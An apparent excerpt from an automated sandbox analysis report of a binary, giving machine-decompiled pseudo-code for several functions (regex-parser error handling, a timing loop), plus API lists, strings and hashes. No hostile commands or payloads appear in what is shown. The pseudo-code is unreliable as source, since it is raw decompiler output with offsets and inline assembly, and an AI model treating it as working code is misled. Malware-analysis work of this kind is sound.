						 *0x417230(1, _t418 - 0x40,  *(_t418 - 0x10), 0);
						 *(_t418 - 0x18) =  *(_t418 - 0xe1);
						 *(_t418 - 0x10) = 0;
						_t303 = E00402CEB(_t418 - 0xf0, _t418 - 0x30,  *(_t320 + 0x68));
						_t426 = _t421 + 0xc;
						__eflags = _t303;
						if(_t303 == 0) {
							_t304 = 0x41cbc0;
						} else {
							_t304 = E00402504(_t418 - 0x2c, 0);
						}
						_t380 = 6;
						memcpy(_t418 - 0x7c, _t304, _t380 << 2);
						_t427 = _t426 + 0xc;
						asm("movsw");
						__eflags =  *((char*)(_t418 - 0x74));
						if( *((char*)(_t418 - 0x74)) != 0) {
							_t410 = 0;
							__eflags = 0;
							while(1) {
								__eflags =  *(_t418 - 0x28);
								if( *(_t418 - 0x28) == 0) {
									goto L21;
								}
								_t310 =  *((intOrPtr*)(_t418 - 0x24)) -  *(_t418 - 0x28);
								_t389 = 0x1a;
								asm("cdq");
								__eflags = _t410 - _t310 / _t389;
								if(_t410 < _t310 / _t389) {
									_t312 = _t410;
									asm("cdq");
									__eflags = _t312 %  *(_t418 - 0x18) - 1;
									if(_t312 %  *(_t418 - 0x18) == 1) {
										 *(_t418 - 0x10) =  *(_t418 - 0x10) + 1;
										_push(_t418 - 0x74);
										_t317 =  *(E004022E2(E00402504(_t418 - 0x2c, _t410)) + 4);
										 *(_t418 - 4) = 6;
										__eflags = _t317;
										if(_t317 == 0) {
											_t317 =  *0x417238; // 0x6cd06082
										}
										L0041532E();
										 *(_t418 - 4) = 3;
										 *0x417230(1, _t317);
										_push("\r\n---------------------------------------------\r\n");
										L0041532E();
									}
									_t410 = _t410 + 1;
									continue;
								}
								goto L21;
							}
						}
						L21:
						 *(_t418 - 0x18) =  *0x417298();
						_t382 = _t418 - 0x14;
						asm("fild dword [ebp-0x18]");
						 *((long long*)(_t418 - 0x48)) = _t430;
						L004152EC();
						_push( *(_t418 - 0x10));
						_push(_t382);
						_push(_t382);
						 *(_t418 - 4) = 7;
						 *_t427 =  *((long long*)(_t418 - 0x48)) -  *((long long*)(_t418 - 0x50));
						_push(0x41c128);
						_push(_t418 - 0x14);
						L00415328();
						_push( *(_t418 - 0x14));
						_push(0x3ec);
						L00415322();
						L0041531C();
						_push(0);
						L00415334();
						 *(_t418 - 4) = 3;
						L00415214();
						 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
						E00402269(_t418 - 0xf0);
						 *(_t418 - 4) =  *(_t418 - 4) | 0xffffffff;
						 *((intOrPtr*)(_t418 - 0x30)) = 0x417664;
						_t229 = E00402249();
					}
				} else {
					L00415226();
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t418 - 0xc));
				return _t229;
			}

0x00401b41
0x00401b46
0x00401b4b
0x00401b51
0x00401b5a
0x00401b5c
0x00401b68
0x00401b6b
0x00401d6f
0x00401d72
0x00401f6a
0x00401f6d
0x00401f73
0x00401f77
0x00401f7f
0x00401f84
0x00401f8b
0x00401f92
0x00401f95
0x00401f97
0x00401f97
0x00401f9e
0x00401fa1
0x00401fa3
0x00401fa3
0x00401fa3
0x00401fa3
0x00401fa7
0x00401faa
0x00401fac
0x00401fac
0x00401fac
0x00401fac
0x00401fb0
0x00401fb8
0x00401fbe
0x00401fc1
0x00401fcb
0x00401fce
0x00401fd1
0x00401fe7
0x00401ffa
0x00402002
0x00402007
0x00402016
0x0040201a
0x00402023
0x00402026
0x00402029
0x0040202c
0x00402033
0x0040203c
0x00402040
0x00402043
0x00402059
0x00402071
0x00402075
0x0040207a
0x0040207c
0x0040207f
0x00402085
0x00402088
0x0040208b
0x00402091
0x00402094
0x0040209f
0x004020a5
0x004020ab
0x004020bc
0x004020c2
0x004020c8
0x004020cc
0x004020ce
0x004020d0
0x004020d0
0x004020d9
0x004020e6
0x004020f3
0x004020f7
0x004020fd
0x00402101
0x00402101
0x00402101
0x00402101
0x0040208b
0x00402108
0x0040210b
0x0040210e
0x00402111
0x00402114
0x00402127
0x0040212b
0x00402134
0x00402146
0x0040214d
0x00402155
0x0040215d
0x00402161
0x0040216b
0x0040216f
0x00402178
0x0040217c
0x00402181
0x00402181
0x00402181
0x00402185
0x00000000
0x00402185
0x00401d78
0x00401d78
0x00401d7c
0x00401d84
0x00401d89
0x00401d90
0x00401d97
0x00401d9a
0x00401d9c
0x00401d9c
0x00401da3
0x00401da6
0x00401da8
0x00401da8
0x00401da8
0x00401da8
0x00401dac
0x00401daf
0x00401db1
0x00401db1
0x00401db1
0x00401db1
0x00401db5
0x00401dbb
0x00401dbd
0x00401dc0
0x00401dc3
0x00401dce
0x00401dd1
0x00401dd4
0x00401de6
0x00401def
0x00401dfa
0x00401e01
0x00401e07
0x00401e1c
0x00401e30
0x00401e3c
0x00401e41
0x00401e53
0x00401e57
0x00401e62
0x00401e66
0x00401e76
0x00401e7e
0x00401e86
0x00401e8a
0x00401e8d
0x00401e9f
0x00401ea5
0x00401ead
0x00401eaf
0x00401eb0
0x00401eb7
0x00401ebe
0x00401ec4
0x00401ec6
0x00401ec9
0x00401ecc
0x00401ece
0x00401ed0
0x00401ed0
0x00401ed9
0x00401ee0
0x00401ee3
0x00401ee6
0x00401ee9
0x00401eec
0x00401efd
0x00401f01
0x00401f0a
0x00401f1c
0x00401f23
0x00401f2c
0x00401f34
0x00401f38
0x00401f42
0x00401f46
0x00401f52
0x00401f56
0x00401f5b
0x00401f5f
0x0040218b
0x0040218b
0x0040218b
0x00401b71
0x00401b71
0x00401b75
0x00401b7d
0x00401b82
0x00401b8e
0x00401b93
0x00401b9c
0x00401ba3
0x00401ba6
0x00401ba9
0x00401bab
0x00401bab
0x00401bb2
0x00401bb5
0x00401bb7
0x00401bb7
0x00401bb7
0x00401bb7
0x00401bbb
0x00401bbe
0x00401bc0
0x00401bc0
0x00401bc0
0x00401bc0
0x00401bc4
0x00401bca
0x00401bcd
0x00401bd0
0x00401bda
0x00401bdd
0x00401be0
0x00401bf2
0x00401c05
0x00401c0a
0x00401c0f
0x00401c1e
0x00401c22
0x00401c31
0x00401c3f
0x00401c42
0x00401c47
0x00401c4a
0x00401c4c
0x00401c59
0x00401c4e
0x00401c52
0x00401c52
0x00401c62
0x00401c66
0x00401c66
0x00401c68
0x00401c6a
0x00401c6e
0x00401c70
0x00401c70
0x00401c72
0x00401c72
0x00401c76
0x00000000
0x00000000
0x00401c7d
0x00401c80
0x00401c81
0x00401c84
0x00401c86
0x00401c88
0x00401c8a
0x00401c8e
0x00401c91
0x00401c93
0x00401c99
0x00401caa
0x00401cad
0x00401cb1
0x00401cb3
0x00401cb5
0x00401cb5
0x00401cc0
0x00401cca
0x00401cce
0x00401cd4
0x00401cdb
0x00401cdb
0x00401ce0
0x00000000
0x00401ce0
0x00000000
0x00401c86
0x00401c72
0x00401ce3
0x00401ce9
0x00401cec
0x00401cef
0x00401cf2
0x00401cf5
0x00401cfa
0x00401d06
0x00401d07
0x00401d08
0x00401d0c
0x00401d0f
0x00401d14
0x00401d15
0x00401d1f
0x00401d22
0x00401d27
0x00401d2e
0x00401d33
0x00401d37
0x00401d3f
0x00401d43
0x00401d48
0x00401d52
0x00401d57
0x00401d5e
0x00401d65
0x00401d65
0x00401b5e
0x00401b5e
0x00401b5e
0x00402196
0x0040219e

APIs

_EH_prolog.MSVCRT ref: 00401B46
clock.MSVCRT ref: 00401BC4
strlen.MSVCRT ref: 00401BE7

Strings

`vA, xrefs: 00401C38, 00401D4C, 00401C3E
---------------------------------------------, xrefs: 00401CD4, 004020DE
dvA, xrefs: 00401C34, 00401C37
`vA, xrefs: 0040206B, 00402185
+&@, xrefs: 00401C0F, 00401E41, 00402007
>$@, xrefs: 00401B93, 00401D5E
`vA, xrefs: 00401EB8, 00401F5F, 00401EBE

Memory Dump Source

Source File: 00000000.00000002.259443485.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259439860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259443485.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259443485.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_02hNixBIvP.jbxd

Similarity

API ID: H_prologclockstrlen
String ID: ---------------------------------------------$+&@$>$@$`vA$`vA$`vA$dvA
API String ID: 3760762678-3690534125
Opcode ID: cb31b7f8cf5ff64ab10fccd60eddeedd65f391d4cee35c01d010414b96f27912
Instruction ID: 3512c44382567f2ea4b4915ac8f057547d101fd7276799898dd384eece168e15
Opcode Fuzzy Hash: cb31b7f8cf5ff64ab10fccd60eddeedd65f391d4cee35c01d010414b96f27912
Instruction Fuzzy Hash: 4C127131804209EFDF14EFA4CD85BEDBB74BF54304F1440AAF815A7292DBB85A85CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00404A98 Relevance: 16.9, APIs: 8, Strings: 3, Instructions: 360
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 42%

			E00404A98(signed int __ebx) {
				void* _t164;
				intOrPtr _t174;
				intOrPtr _t188;
				signed int _t192;
				intOrPtr _t193;
				signed int _t204;
				intOrPtr _t221;
				intOrPtr _t222;
				intOrPtr _t223;
				intOrPtr _t224;
				void* _t231;
				intOrPtr _t233;
				signed int _t236;
				intOrPtr* _t262;
				signed int _t287;
				signed int _t288;
				signed int _t290;
				void* _t294;
				signed int _t301;
				signed int _t310;
				signed char _t311;
				intOrPtr* _t323;
				signed int* _t329;
				char* _t330;
				intOrPtr _t335;
				char* _t337;
				intOrPtr _t338;
				char* _t339;
				char* _t340;
				intOrPtr _t341;
				void* _t344;

				_t236 = __ebx;
				 *((char*)(_t344 - 0x15)) = 1;
				E004079C9(__ebx + 0x43, _t344 + 0xc,  *((intOrPtr*)(__ebx + 0x47)), _t329);
				 *0x41720c();
				asm("sbb ecx, ecx");
				if(E004090FF( *(_t344 + 8),  ~( *( *((intOrPtr*)(__ebx + 0x27)) + 4)) &  *((intOrPtr*)( *((intOrPtr*)(__ebx + 0x27)) + 8)) +  *( *((intOrPtr*)(__ebx + 0x27)) + 4), 0xffffffff) == 0) {
					L4:
					_t323 =  *((intOrPtr*)(_t236 + 0x27));
					 *((intOrPtr*)(_t344 - 0x28)) =  *( *(_t344 + 8));
					 *0x41720c();
					asm("sbb ecx, ecx");
					_t164 = E00406D0A( *((intOrPtr*)(_t344 + 0x10)), _t344 - 0x28,  ~( *(_t323 + 4)) &  *((intOrPtr*)(_t323 + 8)) +  *(_t323 + 4));
					__eflags = _t164 - 0x4b;
					if(_t164 < 0x4b) {
						L7:
						 *((char*)(_t344 - 0x80)) =  *((intOrPtr*)(_t344 + 0x13));
						 *0x417230(0);
						_t330 = "bad extension sequence";
						 *0x417234(_t330, strlen(_t330));
						 *(_t344 - 4) = 0xd;
						E00404FA7(_t344 - 0xb0, _t344 - 0x80);
						_push(0x4196f8);
						_push(_t344 - 0xb0);
						 *((intOrPtr*)(_t344 - 0xb0)) = 0x417698;
						L004153FE();
						while(1) {
							 *0x41720c();
							asm("sbb ecx, ecx");
							_t174 = E00406B23( *((intOrPtr*)(_t344 + 0x10)), _t323,  ~( *( *((intOrPtr*)(_t236 + 0x27)) + 4)) &  *((intOrPtr*)( *((intOrPtr*)(_t236 + 0x27)) + 8)) +  *( *((intOrPtr*)(_t236 + 0x27)) + 4));
							__eflags = _t174 - 2;
							if(_t174 == 2) {
								goto L16;
							}
							__eflags = _t174;
							if(_t174 == 0) {
								_t341 =  *((intOrPtr*)(_t236 + 0x27));
								 *0x41720c();
								_t287 =  *(_t341 + 4);
								_t221 =  *_t323;
								asm("sbb edx, edx");
								__eflags = ( ~_t287 &  *((intOrPtr*)(_t341 + 8)) + _t287) - _t221;
								if(( ~_t287 &  *((intOrPtr*)(_t341 + 8)) + _t287) != _t221) {
									_t222 = _t221 + 1;
									__eflags = _t222;
									 *_t323 = _t222;
								}
							}
							_t338 =  *((intOrPtr*)(_t236 + 0x27));
							 *0x41720c();
							_t204 =  *(_t338 + 4);
							asm("sbb ecx, ecx");
							__eflags = ( ~_t204 &  *((intOrPtr*)(_t338 + 8)) + _t204) -  *_t323;
							if(( ~_t204 &  *((intOrPtr*)(_t338 + 8)) + _t204) !=  *_t323) {
								continue;
							} else {
								 *((char*)(_t344 - 0x90)) =  *((intOrPtr*)(_t344 + 0x13));
								 *0x417230(0);
								_t339 = "Expecting end of comment";
								 *0x417234(_t339, strlen(_t339));
								 *(_t344 - 4) = 0xe;
								E00404FA7(_t344 - 0xcc, _t344 - 0x90);
								 *((intOrPtr*)(_t344 - 0xcc)) = 0x417698;
								L004153FE();
								 *((char*)(_t344 - 0x48)) =  *((intOrPtr*)(_t344 + 0x13));
								 *0x417230(0, _t344 - 0xcc, 0x4196f8);
								_t340 = "bad extension sequence";
								 *0x417234(_t340, strlen(_t340));
								 *(_t344 - 4) = 0xf;
								E00404FA7(_t344 - 0x70, _t344 - 0x48);
								_push(0x4196f8);
								_push(_t344 - 0x70);
								 *((intOrPtr*)(_t344 - 0x70)) = 0x417698;
								L004153FE();
								 *_t323 =  *((intOrPtr*)(_t344 - 0x28));
							}
							goto L16;
						}
					} else {
						__eflags = _t164 - 0x4e;
						if(_t164 > 0x4e) {
							goto L7;
						} else {
							_t288 = _t236;
							_t223 = E00404705(_t288,  *(_t344 + 8), 0,  *((intOrPtr*)(_t344 + 0x10)),  *((intOrPtr*)(_t344 + 0x14)));
							__eflags = _t223;
							 *(_t344 - 0x34) = _t288 & 0xffffff00 | __eflags != 0x00000000;
							 *((intOrPtr*)(_t344 - 0x30)) = _t223;
							_t290 =  *_t329;
							 *(_t344 - 4) = 0xc;
							 *_t329 = _t290 + 1;
							_push(_t236 + 4);
							_push(_t223);
							_push(_t290);
							_t224 = E004091BE(__eflags);
							 *((intOrPtr*)(_t344 - 0x1c)) = _t224;
							__eflags = _t224;
							 *((char*)(_t344 - 0x20)) = _t290 & 0xffffff00 | _t224 != 0x00000000;
							E0040BF91(_t344 - 0x14, _t344 - 0x20);
							E00406ED3(_t344 - 0x20);
							 *(_t344 - 0x34) =  *(_t344 - 0x34) & 0x00000000;
							 *(_t344 - 4) =  *(_t344 - 4) & 0x00000000;
							_t294 = _t344 - 0x34;
							goto L3;
						}
					}
				} else {
					 *0x41720c();
					asm("sbb ecx, ecx");
					_t231 = E00406B23( *((intOrPtr*)(_t344 + 0x10)),  *(_t344 + 8),  ~( *( *((intOrPtr*)(__ebx + 0x27)) + 4)) &  *((intOrPtr*)( *((intOrPtr*)(__ebx + 0x27)) + 8)) +  *( *((intOrPtr*)(__ebx + 0x27)) + 4));
					_t352 = _t231 - 2;
					if(_t231 != 2) {
						goto L4;
					} else {
						_t14 =  *_t329 + 1; // 0x1
						 *_t329 = _t14;
						_t301 = __ebx + 4;
						_push(_t301);
						_push(1);
						_push( *_t329);
						_t233 = E00409146(_t301, _t352);
						 *((intOrPtr*)(_t344 - 0x1c)) = _t233;
						 *((char*)(_t344 - 0x20)) = _t301 & 0xffffff00 | _t233 != 0x00000000;
						E0040BF91(_t344 - 0x14, _t344 - 0x20);
						_t294 = _t344 - 0x20;
						L3:
						E00406ED3(_t294);
					}
				}
				L16:
				_t257 =  *((intOrPtr*)(_t344 - 0x10));
				if( *((intOrPtr*)(_t344 - 0x10)) != 0) {
					E00406F41(_t257);
					do {
						_push( *((intOrPtr*)(_t344 + 0x14)));
						_push( *((intOrPtr*)(_t344 + 0x10)));
						_push( *((intOrPtr*)(_t344 - 0x10)));
						_push( *(_t344 + 8));
					} while (E004050B8(_t236) != 0);
					E00406F61( *((intOrPtr*)(_t344 - 0x10)), _t344 - 0x24, _t236 + 4);
					_t325 = _t344 - 0x38;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsb");
					if( *((char*)(_t344 - 0x15)) != 0) {
						_t101 =  *((intOrPtr*)(_t344 - 0x10)) + 8; // 0x8
						if(E00407CC2(_t101) > 2) {
							 *((char*)(_t344 - 0x48)) =  *((intOrPtr*)(_t344 + 0x13));
							 *0x417230(0);
							_t337 = "Too many alternates in conditional subexpression";
							 *0x417234(_t337, strlen(_t337));
							 *(_t344 - 4) = 0x12;
							E00404FA7(_t344 - 0x70, _t344 - 0x48);
							_push(0x4196f8);
							_push(_t344 - 0x70);
							 *((intOrPtr*)(_t344 - 0x70)) = 0x417698;
							L004153FE();
						}
					}
					_t262 =  *((intOrPtr*)(_t344 - 0x10));
					if( *(_t344 - 0x38) != 0 &&  *(_t262 + 0x10) == 0) {
						_t192 = E0040507F( *((intOrPtr*)(_t236 + 4)), 0x10d);
						 *(_t344 + 8) = _t192;
						 *(_t344 - 4) = 0x13;
						if(_t192 == 0) {
							_t193 = 0;
							__eflags = 0;
						} else {
							_t193 = E004074E9(_t192,  *((intOrPtr*)(_t344 - 0x37)),  *((intOrPtr*)(_t344 - 0x33)),  *((intOrPtr*)(_t344 - 0x2f)));
						}
						 *(_t344 - 4) =  *(_t344 - 4) & 0x00000000;
						_t262 =  *((intOrPtr*)(_t344 - 0x10));
						 *((intOrPtr*)(_t236 + 0x4f)) = _t193;
					}
					_t310 =  *(_t262 + 0x10);
					if(_t310 != 0xffffffff) {
						_t335 =  *((intOrPtr*)(_t344 + 0x14));
						_t126 = _t335 + 4; // 0x405058
						_t188 =  *_t126;
						if(_t188 == 0) {
							L31:
							 *(_t344 + 8) =  *(_t344 + 8) & 0x00000000;
							E00407584(_t335, _t325,  *(_t262 + 0x10) + 1, _t344 + 8);
							_t262 =  *((intOrPtr*)(_t344 - 0x10));
						} else {
							_t127 = _t335 + 8; // 0x0
							_t325 =  *_t127 - _t188 >> 2;
							if(_t310 >=  *_t127 - _t188 >> 2) {
								goto L31;
							}
						}
						_t134 = _t335 + 4; // 0x405058
						 *((intOrPtr*)( *_t134 +  *(_t262 + 0x10) * 4)) = _t262;
						_t262 =  *((intOrPtr*)(_t344 - 0x10));
					}
					_t311 =  *(_t344 - 0x4c);
					 *(_t344 - 0x34) = _t311;
					 *((intOrPtr*)(_t344 - 0x30)) =  *((intOrPtr*)( *((intOrPtr*)(_t344 - 0x54)))) - _t311;
					 *((intOrPtr*)( *_t262 + 0x34))(_t344 - 0x34);
					 *((intOrPtr*)( *((intOrPtr*)(_t344 + 0x10)))) =  *((intOrPtr*)(_t344 - 0x50));
				}
				 *(_t344 - 0x14) =  *(_t344 - 0x14) & 0x00000000;
				 *(_t344 - 4) =  *(_t344 - 4) | 0xffffffff;
				E00406ED3(_t344 - 0x14);
				 *[fs:0x0] =  *((intOrPtr*)(_t344 - 0xc));
				return  *((intOrPtr*)(_t344 - 0x10));
			}

0x00404a98
0x00404aa3
0x00404aa8
0x00404ab2
0x00404ac4
0x00404ad8
0x00404b40
0x00404b43
0x00404b4a
0x00404b4d
0x00404b5f
0x00404b6b
0x00404b70
0x00404b73
0x00404bdf
0x00404be7
0x00404bea
0x00404bf0
0x00404c01
0x00404c11
0x00404c15
0x00404c20
0x00404c25
0x00404c26
0x00404c30
0x00404c35
0x00404c3a
0x00404c4c
0x00404c55
0x00404c5a
0x00404c5d
0x00000000
0x00000000
0x00404c63
0x00404c65
0x00404c67
0x00404c6c
0x00404c72
0x00404c78
0x00404c80
0x00404c84
0x00404c86
0x00404c88
0x00404c88
0x00404c89
0x00404c89
0x00404c86
0x00404c8b
0x00404c90
0x00404c96
0x00404ca2
0x00404ca6
0x00404ca8
0x00000000
0x00404caa
0x00404cb5
0x00404cbb
0x00404cc1
0x00404cd5
0x00404ce8
0x00404cec
0x00404cfd
0x00404d07
0x00404d14
0x00404d17
0x00404d1d
0x00404d2e
0x00404d3b
0x00404d3f
0x00404d47
0x00404d4c
0x00404d4d
0x00404d54
0x00404d5c
0x00404d5c
0x00000000
0x00404ca8
0x00404b75
0x00404b75
0x00404b78
0x00000000
0x00404b7a
0x00404b7d
0x00404b87
0x00404b8c
0x00404b91
0x00404b94
0x00404b97
0x00404b99
0x00404ba0
0x00404ba5
0x00404ba6
0x00404ba7
0x00404ba8
0x00404bb0
0x00404bb3
0x00404bbb
0x00404bc2
0x00404bca
0x00404bcf
0x00404bd3
0x00404bd7
0x00000000
0x00404bd7
0x00404b78
0x00404ada
0x00404adf
0x00404af1
0x00404afc
0x00404b01
0x00404b04
0x00000000
0x00404b06
0x00404b08
0x00404b0b
0x00404b0d
0x00404b10
0x00404b11
0x00404b13
0x00404b14
0x00404b1c
0x00404b27
0x00404b2e
0x00404b33
0x00404b36
0x00404b36
0x00404b36
0x00404b04
0x00404e17
0x00404e17
0x00404e1c
0x00404e22
0x00404e27
0x00404e27
0x00404e2c
0x00404e2f
0x00404e32
0x00404e3a
0x00404e49
0x00404e50
0x00404e53
0x00404e54
0x00404e59
0x00404e5a
0x00404e5b
0x00404e60
0x00404e6b
0x00404e75
0x00404e78
0x00404e7e
0x00404e8f
0x00404e9c
0x00404ea0
0x00404ea8
0x00404ead
0x00404eae
0x00404eb5
0x00404eb5
0x00404e6b
0x00404ebe
0x00404ec1
0x00404ed1
0x00404ed6
0x00404edb
0x00404edf
0x00404ef3
0x00404ef3
0x00404ee1
0x00404eec
0x00404eec
0x00404ef5
0x00404ef9
0x00404efc
0x00404efc
0x00404eff
0x00404f05
0x00404f07
0x00404f0a
0x00404f0a
0x00404f0f
0x00404f1d
0x00404f1d
0x00404f2c
0x00404f31
0x00404f11
0x00404f11
0x00404f16
0x00404f1b
0x00000000
0x00000000
0x00404f1b
0x00404f37
0x00404f3a
0x00404f3d
0x00404f3d
0x00404f43
0x00404f46
0x00404f50
0x00404f56
0x00404f5f
0x00404f5f
0x00404f61
0x00404f68
0x00404f6f
0x00404f7c
0x00404f84

APIs

strlen.MSVCRT ref: 00404BF6
_CxxThrowException.MSVCRT ref: 00404C30
strlen.MSVCRT ref: 00404CC7
_CxxThrowException.MSVCRT ref: 00404D07
strlen.MSVCRT ref: 00404D23

Part of subcall function 00409146: _EH_prolog.MSVCRT ref: 0040914B

_CxxThrowException.MSVCRT(?,004196F8), ref: 00404D54
strlen.MSVCRT ref: 00404E84
_CxxThrowException.MSVCRT(?,004196F8), ref: 00404EB5

Strings

Expecting end of comment, xrefs: 00404CC1, 00404CC6, 00404CCE
Too many alternates in conditional subexpression, xrefs: 00404E7E, 00404E83, 00404E8B
bad extension sequence, xrefs: 00404BF0, 00404BF5, 00404BFD, 00404D1D, 00404D22, 00404D2A

Memory Dump Source

Source File: 00000000.00000002.259443485.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259439860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259443485.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259443485.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_02hNixBIvP.jbxd

Similarity

API ID: ExceptionThrowstrlen$H_prolog
String ID: Expecting end of comment$Too many alternates in conditional subexpression$bad extension sequence
API String ID: 875129476-4221926769
Opcode ID: 479213fdc7442555299a49b1fb84c69309523d2a4e49a1813322bbfe5e0f6111
Instruction ID: 0d6a007eb94e37c954dd8b579f3e195dca48f335e64544f17c8c6cf0d3b22ef3
Opcode Fuzzy Hash: 479213fdc7442555299a49b1fb84c69309523d2a4e49a1813322bbfe5e0f6111
Instruction Fuzzy Hash: A6E1A471A0121ADFCF14DF64C890AEEB7B5FF88304F14416EE816A7281DB78AD45CB65

Uniqueness

Uniqueness Score: -1.00%

Function 004061BE Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 23%

			E004061BE(intOrPtr __ecx) {
				signed int _t158;
				signed int _t166;
				signed int _t178;
				signed int _t180;
				signed int _t184;
				signed int _t185;
				void* _t190;
				signed int _t216;
				void* _t237;
				signed int _t265;
				void* _t317;
				signed int _t320;
				signed int _t324;
				void* _t325;
				void* _t329;
				void* _t333;
				signed int _t334;
				char* _t336;
				char* _t337;
				void* _t338;
				void* _t340;
				void* _t341;
				void* _t345;

				L004153D0();
				_t341 = _t340 - 0x88;
				_t334 =  *(_t338 + 8);
				 *((intOrPtr*)(_t338 - 0x24)) = __ecx;
				 *0x41720c(_t317, _t333, _t237);
				 *(_t338 + 8) =  *(_t334 + 4);
				 *((intOrPtr*)(_t338 - 0x20)) =  *((intOrPtr*)(__ecx + 0x13));
				 *(_t338 - 0x18) = 0;
				 *(_t338 - 0x14) = 0;
				 *((char*)( *((intOrPtr*)(_t338 + 0xc)))) = 0;
				while(1) {
					L1:
					 *(_t338 - 0x10) = 0;
					while(1) {
						L2:
						 *0x41720c();
						_t158 =  *(_t334 + 4);
						asm("sbb ecx, ecx");
						if(( ~_t158 &  *((intOrPtr*)(_t334 + 8)) + _t158) ==  *(_t338 + 8)) {
							break;
						}
						 *0x41720c();
						asm("sbb ecx, ecx");
						_t320 = E00406C89(_t338 + 8,  ~( *(_t334 + 4)) &  *((intOrPtr*)(_t334 + 8)) +  *(_t334 + 4));
						_t345 = _t320 - 0x25;
						if(_t345 > 0) {
							__eflags = _t320 - 0x26;
							if(_t320 == 0x26) {
								 *0x41720c();
								_t166 =  *(_t334 + 4);
								asm("sbb ecx, ecx");
								__eflags = ( ~_t166 &  *((intOrPtr*)(_t334 + 8)) + _t166) -  *(_t338 + 8);
								if(( ~_t166 &  *((intOrPtr*)(_t334 + 8)) + _t166) ==  *(_t338 + 8)) {
									goto L50;
								} else {
									__eflags =  *(_t338 - 0x10);
									if( *(_t338 - 0x10) != 0) {
										E00407990( *((intOrPtr*)(_t338 + 0x10)), _t338 - 0x5c,  *((intOrPtr*)( *((intOrPtr*)(_t338 + 0x10)) + 4)), _t338 - 0x18);
									}
									 *0x41720c();
									 *(_t338 + 8) =  *(_t338 + 8) + 1;
									 *(_t338 - 0x10) = 1;
									 *(_t338 - 0x14) =  *(_t338 + 8) -  *(_t334 + 4);
									continue;
								}
							} else {
								__eflags = _t320 - 0x27;
								if(__eflags == 0) {
									__eflags =  *(_t338 - 0x10);
									if( *(_t338 - 0x10) != 0) {
										E00407990( *((intOrPtr*)(_t338 + 0x10)), _t338 - 0x30,  *((intOrPtr*)( *((intOrPtr*)(_t338 + 0x10)) + 4)), _t338 - 0x18);
									}
									 *0x41720c();
									_t178 =  *(_t338 + 8);
									_t265 = _t178 -  *(_t334 + 4);
									__eflags = _t265;
									 *(_t338 - 0x14) = _t265;
									while(1) {
										 *(_t338 - 0x1c) = _t178;
										 *0x41720c();
										_t180 =  *(_t334 + 4);
										asm("sbb ecx, ecx");
										__eflags = ( ~_t180 &  *((intOrPtr*)(_t334 + 8)) + _t180) -  *(_t338 + 8);
										if(( ~_t180 &  *((intOrPtr*)(_t334 + 8)) + _t180) ==  *(_t338 + 8)) {
											break;
										}
										 *0x41720c();
										asm("sbb ecx, ecx");
										_t320 = E00406C89(_t338 + 8,  ~( *(_t334 + 4)) &  *((intOrPtr*)(_t334 + 8)) +  *(_t334 + 4));
										__eflags = _t320;
										if(_t320 == 0) {
											_t97 = _t338 + 8;
											 *_t97 =  *(_t338 + 8) + 1;
											__eflags =  *_t97;
											goto L40;
										} else {
											__eflags = _t320 - 0x2c;
											if(_t320 != 0x2c) {
												L40:
												_t178 =  *(_t338 + 8);
												continue;
											}
										}
										break;
									}
									 *0x41720c();
									_t184 =  *(_t338 - 0x1c) -  *(_t338 - 0x14) -  *(_t334 + 4);
									__eflags = _t184;
									 *(_t338 - 0x10) = _t184;
									if(_t184 != 0) {
										E00407990( *((intOrPtr*)(_t338 + 0x10)), _t338 - 0x28,  *((intOrPtr*)( *((intOrPtr*)(_t338 + 0x10)) + 4)), _t338 - 0x18);
									}
									_t185 = 0x2c;
									__eflags = _t320 - _t185;
									if(_t320 != _t185) {
										goto L30;
									} else {
										_t272 =  *((intOrPtr*)(_t338 + 0x10));
										 *(_t338 - 0x14) = _t185;
										 *(_t338 - 0x18) = 2;
										_push(_t338 - 0x18);
										_push( *((intOrPtr*)( *((intOrPtr*)(_t338 + 0x10)) + 4)));
										_t190 = _t338 - 0x44;
										goto L29;
									}
								} else {
									if(__eflags <= 0) {
										goto L31;
									} else {
										__eflags = _t320 - 0x2c;
										if(_t320 > 0x2c) {
											goto L31;
										} else {
											__eflags =  *(_t338 - 0x10);
											if( *(_t338 - 0x10) != 0) {
												E00407990( *((intOrPtr*)(_t338 + 0x10)), _t338 - 0x58,  *((intOrPtr*)( *((intOrPtr*)(_t338 + 0x10)) + 4)), _t338 - 0x18);
											}
											_t272 =  *((intOrPtr*)(_t338 + 0x10));
											_push(_t338 - 0x18);
											 *(_t338 - 0x18) = 2;
											 *(_t338 - 0x14) = _t320;
											_push( *((intOrPtr*)( *((intOrPtr*)(_t338 + 0x10)) + 4)));
											_t190 = _t338 - 0x2c;
											L29:
											_push(_t190);
											E00407990(_t272);
											L30:
											 *(_t338 - 0x18) = 0;
											 *0x41720c();
											 *(_t338 - 0x14) =  *(_t338 + 8) -  *(_t334 + 4);
											goto L1;
										}
									}
								}
								goto L54;
							}
						} else {
							if(_t345 == 0) {
								 *0x41720c();
								_t324 =  *(_t338 + 8) -  *(_t334 + 4);
								__eflags =  *(_t338 - 0x10);
								 *((char*)( *((intOrPtr*)(_t338 + 0xc)))) = 1;
								if( *(_t338 - 0x10) != 0) {
									E00406AEB( *((intOrPtr*)(_t338 + 0x10)), _t338 - 0x18);
								}
								 *(_t338 - 0x18) = 1;
								 *(_t338 - 0x14) = 0;
								goto L21;
							} else {
								_t325 = _t320 - 0x22;
